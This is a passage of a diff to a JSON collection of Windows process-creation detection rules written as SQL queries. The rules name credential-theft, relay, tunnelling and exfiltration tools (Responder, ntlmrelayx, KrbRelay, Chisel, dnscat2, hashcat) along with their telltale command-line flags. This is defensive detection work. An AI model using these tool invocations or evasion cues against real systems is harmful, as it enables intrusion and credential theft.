CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", - "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "title": "HackTool - winPEAS Execution", + "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "status": "experimental", + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", - "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "status": "experimental", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ - "Administrative scripts." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "status": "test", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administration use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", - "status": "experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", - "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "author": "frack113", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.005" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" - }, - { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", - "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", + "status": "test", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ "attack.defense_evasion", "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE 